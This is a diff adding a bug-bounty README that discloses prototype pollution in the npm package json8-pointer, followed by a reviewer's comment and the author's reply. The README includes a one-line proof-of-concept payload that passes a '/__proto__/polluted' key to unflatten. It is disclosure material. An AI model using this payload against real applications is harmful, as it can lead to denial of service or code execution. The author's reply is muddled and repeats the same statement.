bounties/npm/json8-pointer/1/README.md

```diff
@@ -0,0 +1,28 @@
+# Description
+
+`json8-pointer` is vulnerable to `Prototype Pollution`.
+This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+var json8Pointer = require("json8-pointer")
+json8Pointer.unflatten({"": {},"/firstName": "John", "/__proto__/polluted": "Yes! Its Polluted"});
+console.log(polluted); 
```

Comment:
Replace with `console.log({}.polluted);`

Reply:
In the above scenario, console.log("After : " + obj1.polluted); is same as console.log("After : " + obj1.polluted); since obj1={}